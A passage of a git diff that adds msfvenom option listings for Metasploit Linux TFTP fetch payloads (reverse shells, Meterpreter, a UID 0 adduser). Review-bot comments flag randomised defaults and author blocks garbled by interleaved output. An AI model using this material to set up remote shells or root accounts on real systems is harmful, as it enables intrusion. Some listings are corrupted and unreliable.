+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 
0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell_reverse_tcp.txt new file mode 100644 index 0000000..81c5c99 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-aarch64-shell_reverse_tcp.txt 
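Review bot: cmd-linux-tftp-aarch64-shell-reverse_tcp.txt carries the same randomised FETCH_FILENAME default (`faFFztSLPkQ`), so the file will churn with every regeneration unless the generator normalises that value. The Description block is also three concatenated descriptions (`Fetch and execute an AARCH64 payload from a TFTP server.`, `dup2 socket in x12, then execve.`, `Connect back to the attacker`) separated by an inconsistent number of blank lines; that is how the fetch wrapper, stager and stage descriptions come out of the module and is fine to keep, but the generator should not strip the blank line between the last description and the advanced options table, which currently starts with no header.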
@@ -0,0 +1,81 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/aarch64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The shell to execute. + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HAVsvkXE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an AARCH64 payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..62114fd --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_http.txt 
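Review bot: cmd-linux-tftp-aarch64-shell_reverse_tcp.txt again embeds a randomised FETCH_FILENAME default (`HAVsvkXE`); same regeneration-noise concern as the other fetch dumps. Otherwise the inline variant is consistent with the staged one above (no EnableStageEncoding/StageEncoder rows, which is expected for an inline payload), so nothing else to flag in this hunk.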
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armbe/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UpVReVFwhH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..a46ece0 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_https.txt 
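Review bot: the `Provided by:` block in cmd-linux-tftp-armbe-meterpreter_reverse_http.txt is corrupted: instead of the author list it contains `Evasion options for payload/cmd/linux/tftp/armbe/meterpreter_reverse_http:` and a `=========================` rule, followed by a truncated `cook@rapid7.com>` and then `timwr`. Compare the aarch64 meterpreter_reverse_tcp dump, where the same module family lists Brendan Watters, Spencer McIntyre, Adam Cammack, Brent Cook and timwr intact. This looks like stdout and stderr of the `--list-options` run being interleaved and partially overwriting each other in the capture; regenerate this file with the two streams captured separately (or only stdout), and add a sanity check to the generator that rejects output where a section header appears inside the author list. Separately, the HttpUnknownRequestResponse default is emitted across several lines (`It works!` on a line of its own, with blank lines around it) and breaks the column layout; collapse whitespace in option values before writing the table.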
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/armbe/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME saSLBWDWxZjB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload 
UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..7a69a7b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-meterpreter_reverse_tcp.txt 
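Review bot: cmd-linux-tftp-armbe-meterpreter_reverse_https.txt has the same corrupted `Provided by:` block as the http variant, but truncated at a different point (`ok@rapid7.com>` here versus `cook@rapid7.com>` there). The differing cut confirms the capture is non-deterministic rather than a bad module string, so these two dumps should not be committed until the generator serialises its output streams; a grep for `Evasion options for` inside any `Provided by:` block would catch the regression. The multi-line HttpUnknownRequestResponse value and the randomised FETCH_FILENAME (`saSLBWDWxZjB`) are the same issues already noted for the http variant.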
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/armbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PUmCCxMciM no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-armbe-shell_bind_tcp.txt new file mode 100644 index 0000000..b44bd88 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-armbe-shell_bind_tcp.txt 
@@ -0,0 +1,72 @@ + + Name: TFTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/armbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command to execute. +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JyZiePnISfv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-adduser.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-adduser.txt new file mode 100644 index 0000000..c946b7c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-adduser.txt 
@@ -0,0 +1,70 @@ + + Name: TFTP Fetch, Linux Add User + Module: payload/cmd/linux/tftp/armle/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME FAKzIflLhDN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from a TFTP server. 
+ Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-armle-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-armle-exec.txt new file mode 100644 index 0000000..1d141e6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-armle-exec.txt 
